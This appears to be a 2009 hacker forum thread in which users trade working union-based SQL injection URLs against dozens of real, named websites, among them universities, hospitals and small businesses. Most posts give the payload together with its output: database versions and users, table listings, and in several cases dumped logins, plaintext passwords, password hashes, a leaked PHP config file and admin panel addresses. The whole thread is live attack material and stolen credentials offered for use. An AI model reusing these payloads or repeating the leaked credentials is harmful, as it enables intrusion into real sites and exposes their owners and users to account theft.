cialis-cialis.com
http://www.cialis-cialis.com/art.php?id=-29%20union%20select%201,2,unhex(hex(concat_ws(0x3a ,version(),user(),database()))),4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9
4.1.10-standard:poppen_shop3@localhost:poppen_shop3
Ranks for good queries in Austrian Google =)
____________________________________________
http://www.talkeetnachamber.org PR4
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9,0,1
5.0.51a-log:talkeetn_db01:talkeetn_db01@boscgi1001.eigbox.net
There is an interesting table with the DB connection data
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,group_concat(column_na me),5,6,7,8,9,0,1%20from%20information_schema.colu mns%20where%20table_name=0x7068704d795365617263685 f73657474696e6773
Let's act =)
http://www.talkeetnachamber.org/news.php?id=-11%20union%20select%201,2,3,concat_ws(0x3a3a3a,DBN ame,DBUser,DBPassword,DBHost),5,6,7,8,9,0,1%20from %20phpMySearch_settings
DBName,DBUser,DBPassword,DBHost
talkeetn_db01:::talkeetn_db01:::freckles:::localhost
[PR 4]
http://www.golf-in-japan.com/prefcourses/data.php?ID=-178+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29--
4.0.27-log:golfinja:golfinja@mynah3.web.gol.com
[PR 0]
http://www.okna-astem.ru/data.php?id=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20--
5.0.51a-community:db_oknaastem1:oknaastem1@localhost
HAXTA4OK
05.05.2009, 13:11
http://www.cash.ge/doors.php?id=1'+union+select+1,2,concat_ws(0x3a,ve rsion(),da tabase(),u ser()),4/*&lang=eng
4.1.22-standard:cashge_aks:cashge_aks@localhost
------------------------------------------------------------------------
A Georgian site about something or other
http://www.muskie.ge/acus.php?lan_id=1&id=-1+union+select+1,2,concat_ws(0x3a,ver sion(),databa se(),user()),4,5--
4.0.27:muskie_ge:muskie_ge@localhost
PR: 2
------------------------------------------------------------------------
http://mitex.ge/index.php?lang=eng&request=news&id=-1+union+select+1,concat_ws(0x3a,version(),data base(),us er()),3,4,5--
4.1.7-max-log:mitex:mitex@localhost
mailbrush
05.05.2009, 15:21
http://acthra.anu.edu.au/cases/case.php?id=86
Blind - union doesn't work for some reason.
V: 5.0.45-log
U: anu_human_rights@doiweb1.-css.anu.edu.eu
DB: regent_acthra
-m0rgan-
05.05.2009, 15:21
http://www.tosport.ru/detail_1247'.html
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/**/from/**/information_schema.tables--
From it we take the table cizar_admin
look at its contents:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20/**/from/**/information_schema.columns/**/where/**/table_name=0x63697a61725f61646d696e--
id,access,login,password,name,position,address,phone,email,description,pactive,menu_access
After that either I'm being dumb, or... in short, the output doesn't work :(
DB data:
http://www.tosport.ru/detail_-1247.html/**/union/**/select/**/1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),ver sion()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20--
HAXTA4OK
05.05.2009, 15:22
Georgia again
http://www.webmix.ge/g_viewweb.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,concat_ws(0x3a,version(),datab ase(),us er()),40--
5.0.75-community-log:webmixin_portfolio:webmixin_portfol@localhost
TIC: 20
PR: 5
mailbrush
05.05.2009, 16:00
http://www.cir.org.br/noticias.php?id=592+union+select+1,2,3,4,5,6,7,con cat_ws(0x3a,user(),database(),version()),9,10,11,1 2,13,14,15,16,17,18,19,20,21,22
cir_admin@localhost:cir_db:4.1.20
-m0rgan-
05.05.2009, 16:08
http://www.fvhospital.com/fr/news/newsdetail.php?id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,CONCAT_WS(CHAR(32,58,32),user(),database(), version()),17--+
db info:
db14709@64.13.192.31 : db14709_fvh_stage : 4.1.25-Debian_mt1
..::TROYAN::..
05.05.2009, 16:49
www.rnb-music.ru
Can't get output with concat
http://www.rnb-music.ru/news/index.html?-627+union+select+1,user(),3,4,5,6,7--
user():altero_rnb@localhost
http://www.rnb-music.ru/news/index.html?-627+union+select+1,version(),3,4,5,6,7--
version():5.0.22
http://www.rnb-music.ru/news/index.html?-627+union+select+1,database(),3,4,5,6,7--
database():altero_rnb
Tables:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,table_name,3,4,5,6,7+from+infor mation_schema.tables--
Users (about 6.5k):
Login:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,name,3,4,5,6,7+from+users--
Pass:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,pass,3,4,5,6,7+from+users--
Admin:
Nick: Altero
Pass: kexik408
Forum:
Nick:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,username,3,4,5,6,7+from+xmb_mem bers--
Pass:
http://www.rnb-music.ru/news/index.html?-627+union+select+1,password,3,4,5,6,7+from+xmb_mem bers--
Admin panel www.rnb-music.ru/admin
Access by IP (
PR:2
TIC:240
config.php
<?php
if (!defined('IN_CODE')) {
exit("Not allowed to run this file directly.");
}
$dbname = 'altero_rnb'; // Name of your database
$dbuser = 'altero_rnb'; // Username used to access it
$dbpw = 'a12345'; // Password used to access it
$dbhost = 'localhost'; // Database host, usually 'localhost'
$database = 'mysql'; // Database type, currently only mysql is supported.
$pconnect = 0; // Persistent connection, 1 = on, 0 = off, use if 'too many connections'-errors appear
// Table Settings
$tablepre = 'xmb_'; // Table-pre
// Path-settings
// In full_path, put the full URL you see when you go to your boards, WITHOUT the filename though!!
// And please, don't forget the / at the end...
$full_url = 'http://rnb-music.ru/konfa/';
// Other settings
// There are situations where you don't want to see the <!-- template start: index -->...<!-- template end: index -->
// tags around each template. In those cases, change the following to false, or true to turn it back on.
// Default value: false;
$comment_output = true;
// Alternative mailer
// some hosts prevent the direct use of sendmail, which php uses to send out emails by default.
// To get around this, we have included code which will contact a separate SMTP server of your
// choice, and will send the mail trough that. The following mailer-options are available:
// 'default' => php's internal mail() function. No additional values need to be set:
// (does not require a username/password/host/port)
// 'socket_SMTP' => a connection to the SMTP server trough sockets. Requires the username,
// password, host and port values to be entered correctly to work.
$mailer['type'] = 'default';
// mailer-options (for socket_SMTP only, currently)
$mailer['username'] = 'MAILER_USER';
$mailer['password'] = 'MAILER_PASS';
$mailer['host'] = 'MAILER_HOST';
$mailer['port'] = 'MAILER_PORT';
// Plugin Settings
$i = 1;
// Plugins are the links in the navigation part of the Header. Plugins built-in by default include Search, FAQ, Member List, Today's Posts, Stats and Board Rules.
// To add extra plugins (links of your own), just edit the code between Start Plugin Code and End Plugin Code. If you with to add more than one, simply copy that block, paste it and add the second one.
// Start Plugin code
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code.
// Start Plugin code for plugin #2
$plugname[$i] = ''; // This is the name of your plugin. eg. Avatar Gallery, TeddyBear, etc.
$plugurl[$i] = ''; // This is the location, link, or URL to the plugin
$plugadmin[$i] = false; // Is this plugin only for admins? Set to true if the plugin can only be seen/used by (super-)admins, false when it's can be used by anyone
$plugimg[$i] = ''; // This is the path (full URL) to the image to show in front of the text.
$i++;
// End plugin code for plugin #2
// To make multiple plugins, copy and paste this plugin-code, so you have multiple entries.
// Registration settings
/***************
* The ipcheck, checks if your IP is a valid IPv4 or IPv6 type, if none of these, it will kill.
* this might shut a few users out, so you can turn it off by changing the $ipcheck variable to 'off'
****************
* The allow_spec_q variable specifies if Special queries (eg. USE database and SHOW DATABASES) are allowed.
* By default, they are not, meaning $allow_spec_q = false;
* To allow them, change $allow_spec_q to true ($allow_spec_q = true;)
****************
* The show_full_info variable lets you decide wether to show the Build and Alpha/Beta/SP markings in the HTML or not.
* Change the value to true to show them, or false to turn them off.
* Default = true;
****************/
$ipcheck = 'off';
$allow_spec_q = true;
$show_full_info = false;
define('DEBUG', false);
// define('DEBUG', true);
?>
[PR 4]
http://www.opaloman.org/data.php?id=-8+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8--
4.1.20:db_opaloman:opal_oman@localhost
[PR 2]
http://www.host-park.ru/data.php?id=-10+union+select+concat_ws(0x3a,version(),database( ),user()),2,3--
5.0.45-community:db_hostpark1:hostpark1@localhost
[PR 1]
http://www.corecta.com/prestige/data.php?id=-2063+union+select+concat_ws(0x3a,version(),databas e(),user())
4.0.27-icd1-log:corectadb:prestige@localhost
[PR 0]
http://www.city-site.com.ua/data.php?m=1&cat=1&subcat=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
5.0.22:citysite_inf:citysite_red@localhost
HAXTA4OK
05.05.2009, 17:54
PR: 6
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,concat_ws(0x3a,version(),d at abase(),use r()),40,41,42,43,44,45/*
5.0.22-log:bibume:rootume@localhost
http://ume.ensta.fr/biblio/show.php?id=-1'+union+%20select+1,2,3,4,table_name,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,table_name,40,41, 42,43,44,45+from+information_schema.tables/*
bib_user
admin:50ea881c822098a867b5643eed614825 :(
------------------------------------------------------------------------
PR: 5
http://www.lorin.fr/produits-categoriesenglish.php?ID=-1+union+select+1,2,concat_ws(0x3a,ver sion(),database(),u ser()),4,5,6--
4.0.25-standard-log:lorinlorin:lorinlorin@10.0.64.123
.:[melkiy]:.
05.05.2009, 18:14
http://www.policlinicagipuzkoa.com/conferencia.php?idioma=eu&id=-3+union+select+1,2,3,4,5,6,7--
Database Version: 5.0.27-log
Database name: poligipzk
User name: poligipzk@albergue-unix.sarenet.es
http://www.ceskatelevize.cz/program/pokr/?idp=10213389625&page=strukturalni-fondy-eu&id=-3+union+select+1,2,3,4,5,6--
Database Version: 5.0.77-log
Database name: podnikatelsky_servises
User name: podniservi@10.1.0.14
http://www.bsl-med.ru/?todo=news&id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-log
Database name: u179055
User name: u179055@10.10.153.189
root:32f82a1f2e69453c3356be43ef06d8cc
Админка:
http://bsl-med.ru/admin/
HAXTA4OK
05.05.2009, 19:02
http://aramis.obspm.fr/HORIZON/php/abstracts.php?id=-1+union+select+1,concat_ws(0x3a,vers ion(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23--
4.0.16-standard:horizon:combes@localhost
Skofield
05.05.2009, 19:05
http://www.che.gatech.edu {PR 5}
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94,95,96--
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84, 85,86,87,88,89,90,91,92,93,94,95,96--
5.0.77:dynabot2:dbread@dot.chbe.gatech.edu
http://www.che.gatech.edu/news/release.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,4 1,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57, 58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74 ,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,9 1,92,93,94,95,96+from+information_schema.tables--
-m0rgan-
05.05.2009, 19:36
TIC - 40
PR - 4
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,concat_ws(0x3a,user,passwo rd,file_priv)%20,4,5,6,7,8+from+mysql.user--+
User info:
root:141091821ee9bcaa:Y
http://www.geostroy.ru/news.php?id=-66+UNION%20SELECT%201,2,CONCAT_WS(CHAR(32,58,32),u ser(),database(),version()),4,5,6,7,8+from+mysql.u ser--+
db info:
volex@1-srv.geostroi.ru : geostroy : 4.0.12-max-nt
Admin panel:
www.geostroy.ru/admin
Skofield
05.05.2009, 19:59
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*
5.0.32-Debian_7etch1-log:cid:infocruz@scplweb.santacruzpl.org
http://www2.santacruzpl.org/cid/public/full.php?id=-1+union+select+group_concat(username,0x3a,password )+from+users/*
Skofield
05.05.2009, 20:14
http://www.gcuc.edu.gh/ (PR 4)
http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3/*
4.1.22-standard-log : gardenc_db : gardenc_user@216.219.95.52
users
http://www.gcuc.edu.gh/academics.php?id=-1+union+select+1,group_concat(username,0x3a,passwo rd),3+from+users/*
http://www.universalrights.net/news/display.php?id=5101+UNION+SELECT+1,AES_DECRYPT(AES _ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,Use r()),0x71),0x71),3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*
by 4.1.9-nt:universalrights:AU20024480@localhost
http://www.satyalife.net/articles-display.php?id=-16+union+select+1,2,concat(user(),0x3a,version(),0 x3a,database()),4,5/*
satyalife_cms@blade1.euronic.fi:5.0.32-Debian_7etch5-log:domainkeskus_satyalife_cms
admin panel
http://www.universalrights.net/login.php
pass:login
admin:admin
)))
winstrool
05.05.2009, 20:27
http://www.jjwxc.net/topten.php?orderstr=1&timeid=-22+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user()),5,6--
4.0.27-hi4-log:selfnovel:monty@10.9.10.108
seems to be a Chinese site, damn))
-m0rgan-
05.05.2009, 20:41
http://namnaren.ncm.gu.se/artikelregister/detail.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5,6,7,8,9,10--
db info:
root@localhost : nbaspub : 5.1.33-log
http://www.opcli.org/display.php?id=4+union+select+1,2,3,4+limit+1,1/*
Database Version: 4.0.27-standard-log
Database name: main2_opcli_org
User name: opcliorg24931052@216.251.35.194
HAXTA4OK
05.05.2009, 21:09
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,concat_ws(0 x3a,version(),databas e(),user()),3,4,5,6,7--
5.0.67-0.dotdeb.1-log:idep_lecroqavocats:lecroqavocats@10.0.31.12
http://www.avocat-lecroq.fr/actualite.php?id=1+union+select+1,column_name,3,4, 5,6,7+from+infor mation_schema.column s+where+table_name=0x7573657273--
columns of the Users table, but then I can't pull the info out; whoever wants to can work on it)
DezMond™
05.05.2009, 21:10
http://edu.e-drugdiscovery.com/qna/qna_edit.php?idx=-45365+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
-m0rgan-
05.05.2009, 21:10
http://www.agro-biz.com.ar/control_roya/news_view.php?id=-1+union+all+select+0,1,CONVERT(CONCAT_WS(CHAR(32,5 8,32),user(),database(),version())%20USING%20latin 1),3,4,5,6,7,8,9--
db info:
tandem@linux.sistemat.com.ar : agrobiz : 4.1.10a-Max
DezMond™
05.05.2009, 21:32
Fooood
http://www.psych.upenn.edu/people_info.php?id=-150+union+select+1,2,3,4,version()/*
4.0.12
BlackPanther
05.05.2009, 21:35
Site: http://www.auc.ca
SQL -
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat_ws(CHAR(32,58,32 ),user(),database(),version()),5--
Outputs***algomauniversity@205.207.185.75 : algomauniversity : 5.0.19-standard
Next, the tables:
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,group_concat(table_name ),5+from+information_schema.tables--
The table that will give results***modcentre_users
Fields in the table modcentre_users***user_id, password, name, email, access, note
The resulting link:
http://www.auc.ca/view.php?page=news&parent=news&id=-192+UnION+aLL+SeLEcT+1,2,3,concat(0x3a,user_id,0x3 a,0x3a,0x3a,password,0x3a,name,0x3a,email),5+from+ modcentre_users--
And here are the final results*Users
HAXTA4OK
05.05.2009, 22:05
http://sparvy.free.fr/cv/showcv.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30--
5.0.67:SPARVY:SPARVY@172.20.245.36
in short, it throws an error when looking for tables =\
------------------------------------------------------------------------
http://artistlikeourselves.com/alo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a,v ersi on(),data base(),user()),28/*
4.0.27-standard-log:db195527007:dbo195527007@74.208.16.30
------------------------------------------------------------------------
PR:7
try reading this
http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,versio n(),database(),user()),4--
5.0.45-log:ktp_new:root@localhost
http://www.ktp.gr/am.php?id=1+union+select+1,2,concat_ws(0x3a,table_ name,0x3a),4+from+information_schema.tables--
this site is brutal, and so many tables =\
_SEREGA_
05.05.2009, 23:02
SQLi:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,2,3,4,5,6--
version:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,version(),3,4,5,6--
4.0.25 =(
info:
http://www.thiederman.com/products_detail.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6--
user() thieder@localhost
database() thieder
HAXTA4OK
05.05.2009, 23:15
http://www.tvsat.gr/static.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
5.0.77-community:tvsat_dorif:tvsat_root@localhost
PR: 2
_SEREGA_
05.05.2009, 23:38
SQLi:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,2,3,4,5--
version:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,version(),3, 4,5--
4.1.22
info:
http://www.netevents.org/recent-eventsdetail.php?id=10+union+select+1,concat_ws(0x 3a,user(),database()),3,4,5--
user() videodem@localhost
database() netevents
HAXTA4OK
05.05.2009, 23:40
http://www.hcmr.gr/english_site/news/latest/hot_topics/show_hot.php?id=-1+union+select+1,concat_ws(0x3a,version(),databa se(),user ()),3,4,5,6,7,8--
5.0.33-log:hot_topics:public@localhost
TIC: 20
PR: 7
_SEREGA_
05.05.2009, 23:52
SQLi:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,2--
version:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,version()--
5.0.27-standard
tables are output with limit:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,table_name+from+information_sche ma.tables--
columns are output with limit:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,column_name+from+information_sch ema.columns--
info:
http://www.kalamazoowedding.com/inline.php?ID=-10+union+select+1,concat_ws(0x3a,user(),database() )--
user() slatsvideo2@209.217.33.21
database() slatsvideo2
http://board.2mcl.com/board/mod/full.php?id=-1'+un ion+all+select+0,1,2,concat_ws(0x3a,ver sion(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
4.1.22:board2mclcom:board@localhost
DezMond™
06.05.2009, 00:19
http://synlab.gatech.edu/project.php?id=-61+union+select+1,version(),3,4,5,6,7,8/*
5.0.45
winstrool
06.05.2009, 09:34
https://secure.vortec.com/store_products.php?catID=31&prodID=89+union+select+1,2,3,4,5,6,7,concat_ws(0x3 b,version(),user(),database()),9,0,11,12,13,14,15, 16,17,18,19,0,21,22+--
5.0.67-log;vortec_user@209.173.135.197;vortec_db
_SEREGA_
06.05.2009, 09:35
SQLi:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,2,3,4,5,6--
version:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,version(),3,4,5,6--
5.0.51-log
tables are output with limit:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables--
columns are output with limit:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,column_name,3,4,5,6+from+informa tion_schema.columns--
info:
http://www.exhalefitness.ca/index.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--
user() dbo228987490@74.208.16.88
winstrool
06.05.2009, 11:44
_http://www.palaver.se/page.php?catid=-92+union+select+1,2,3,concat_ws(0x3b,version(),use r(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,00,1
5.0.32-Debian_7etch10-log;palaver_se@srv26.one.com;palaver_se
_http://www.dhool.com/sotd2/catlist.php?catid=21+union+select+unhex(hex(concat _ws(0x3b,version(),user(),database()))),2
4.1.14;dhooluser@localhost;dhooldb
_http://www.stranadetstva.ru/osnov.php?idraz=-3+union+select+1,concat_ws(0x3b,version(),user(),d atabase())+--
5.0.33;us4320a@localhost;db4320a
admin:44f9e86198d1693e603ba7303b76a460
_SEREGA_
06.05.2009, 11:49
SQLi:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,2,3,4,5,6,7,8--
version:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,version(),3,4,5,6,7,8--
5.0.67-log
tables are output with limit:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,table_name,3,4,5,6,7,8+from+info rmation_schema.tables--
columns are output with limit:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,column_name,3,4,5,6,7,8+from+inf ormation_schema.columns--
info:
http://upadelawarevalley.org/events/event_register.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7,8--
user() upadb@smithers.dreamhost.com
database() upa
HAXTA4OK
06.05.2009, 12:50
http://www.touristicunion.gr/default.php?id=-1'+union+select+1,2,@@ver sion,4,5,6,7/*&lan g=en
5.0.45, after that a wall =\
PR: 4
------------------------------------------------------------------------
http://www.corfuhouse.gr/real_estate.php?lang=en&id=1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,v ersion(),database (),u ser()),10,11,12,13,14,15,16,17,18--
4.0.26:corfuhouse_gr:corfuhou@localhost
------------------------------------------------------------------------
freebie FM in Greece
PR: 4
http://www.freefm.gr/new.php?id=-1+union+select+1,concat_ws(0x3a,versi on(),datab ase(),user()),3,4--
5.0.67-community:free98_fr98:free98_freefm@localhost
http://www.freefm.gr/new.php?id=-1+union+se lect+1,group_concat(table_name),3,4+from +information_schem a.tables+group+by+table_schema--
tables:
links,sunday,downloads,monday,thursday,events,news,tuesday,friday,saturday,wednesday
erihtoney
06.05.2009, 13:49
Georgia again (
http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58 ),username,password),8,9,10,11,12,13,14,15,16,17,1 8,19,
20,21,22+from+stat.users/*
HAXTA4OK
06.05.2009, 13:56
http://www.dipyl on.gr/main.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),us er()),3,4--
5.0.67-community:dipylon_main:dipylon_mainuser@localhost
http://www.dipylon.gr/main.php?id=-1+union+select+1,group_concat(table_name),3,4+from +information_schema.tables+group+by+table_schema--
Only one table =\ :
d_partners
HAXTA4OK
06.05.2009, 13:59
PR: 3
http://www.cinematic.gr/link_en.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,ver sion(),datab ase(),user()),8,9--
4.1.22-standard-log:cinemati_admin:cinemati_admin1@localhost
------------------------------------------------------------------------
Georgia again (
http://internet.ge/v2/index.php?action=catalogue&catid=4444444444444&start=1+union+select+1,2,3,4,5,6,concat_ws(char(58 ),username,password),8,9,10,11,12,13,14,15,16,17,1 8,19,
20,21,22+from+stat.users/*
and where's the SQLi? =\ finish the SQLi, or am I just being dumb? =\
winstrool
06.05.2009, 14:35
_http://www.indmedica.com/specialities.php?catid=-16+union+select+1,version(),3,4,5+--
5.0.45;indmedica@localhost;indmedica
_http://www.kargah.com/names.php?catid=-5+union+select+1,2,concat_ws(0x3b,version(),user() ,database()),4,5,6,7,8,9,0,1,12+--
4.1.22-standard;kargahc_kargah@localhost;kargahc_host002
[PR 4]
http://www.emergentarchitecture.com/about_analogies.php?id=-42+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6--
5.0.67-log:twisco_emergentdb:twisco_r@209.68.2.65
erihtoney
06.05.2009, 16:55
http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat_ws( 0x3a,version(),user(),database()),30
[info]
version:4.0.27-max-log
user:dbo127835715@212.227.119.144
database:db127835715
[users]
http://www.utsg.net/publication.php?Year=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,concat(use rname,0x3a,password),30+from+users--
Development, promotion and maintenance of websites.
http://www.vikki-di.ru/show.php?id=-54+union+select+1,concat(table_name,0x3a,table_row s),3,4,5,6,7,8,9,0,11,12,13,14,15,16+from+informat ion_schema.tables--
<<OAO "Катод">>
http://www.katodnv.ru/print_doc.php?ID=-8)+union+select+concat_ws(0x3a2a3a,version(),datab ase(),user(),@version_compile_os)--+
5.0.32-Debian_7etch10-log:*:katodnv_ru:*:katodnv_ru@localhost
http://www.katodnv.ru/admin - basic authentication
HAXTA4OK
06.05.2009, 21:19
PR: 3
http://www.paraschis.gr/review.php?id=1+union+select+1,2,3,4,5,6,7,8,9,con cat_ws(0x3a,version(),databa se(),us er()),11--
4.1.22-standard:spyros_site:spyros_site@localhost
------------------------------------------------------------------------
PR: 3
http://www.silverwings.gr/main/detail.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10--
5.0.67-community:swings_silverwings:swings_georgek@localh ost
-------------------------------------------------------------------------
PR: 5
Academy of Computer Technologies gg
http://ru6.cti.gr/ru6/projects_view.php?id=-1+union+select+concat_ws(0x3a,version(),databas e(),use r()),2,3,4,5,6,7,8,9,10,11,12--
5.0.27:ru6:siteru6@localhost
http://ru6.cti.gr/ru6/projects_view.php?id=-1+union+select+group_concat(table_name),2,3,4,5,6, 7,8,9,10,11,12+from+information_schema. tables+gr oup+by+ table_schema+limit+1,1--
tables:
projects,people,pub_category,people_info,links,pub _n_auth,pr_n_par,news,publications,pr_n_pub,partne rs
PR 6
http://www.bored.com/drawthings/save.php?id=-2308041+union+select+1,2,3
Database Version: 5.0.51-log
Database name: drawthin_bored
User name: drawthin@web2.bored.com
Skofield
06.05.2009, 22:14
http://www.todocontenidos.com/Tema.php?Id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.22-standard : todocont_conte : todocont_conte@localhost
Skofield
06.05.2009, 22:46
http://www.cafedelmarcommunity.com/las_rozas_village/index_2.php?id=-1+union+select+1,2,3,4,5,6/*
HAXTA4OK
06.05.2009, 22:57
PR: 4
http://www.rent4day.am/template.php?lang=3&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),databa se(),use r())--
4.1.22-standard-log:rent4day_rent4day:rent4day_rent@localhost
------------------------------------------------------------------------
TIC: 10
PR: 6
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,concat_ws(0x3a, version(),datab ase(),user()),5,6,7,8,9,10,11,12--
5.0.67-community-log:agbuam_agbu:agbuam@localhost
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,group_concat(table_name),5,6, 7,8,9,10,11,12+from+information_schema.tabl es+grou p+by +table_schema--
tables:
ypy,images,admin,ysip,news,attachments,projects,do nations,videos,gallery
http://www.agbu.am/index.php?p=ysip&id=-1+union+select+1,2,3,group_concat(column_name),5,6 ,7,8,9,10,11,12+from+information_schema.columns+wh ere+table_name=0x61646d696e--
columns in the admin table:
ID,username,passwd,email
admin :
ID username passwd email
1:agbu.am:ugab2007:admin@agbu.am
DezMond™
06.05.2009, 23:28
http://fieam.locaweb.com.br/senai/noticia.php?idN=-159+union+select+1,2,version(),4,5,6,7,8,9,10,11/*
5.0.41-community
http://www.cubalibredigital.com/noticia.php?id=19478'+union+select+1,2,3,4,5,6,7,8 ,9/*
http://www.adrianomoraes.com/siteam/index.php?lang=eng&do=pbrNoticias&id=-1543'+union+select+1,2,3,4,5,6,7/*&PHPSESSID=94c4qfic3c49aqpohaapedgie6
And an edu, PR 5))
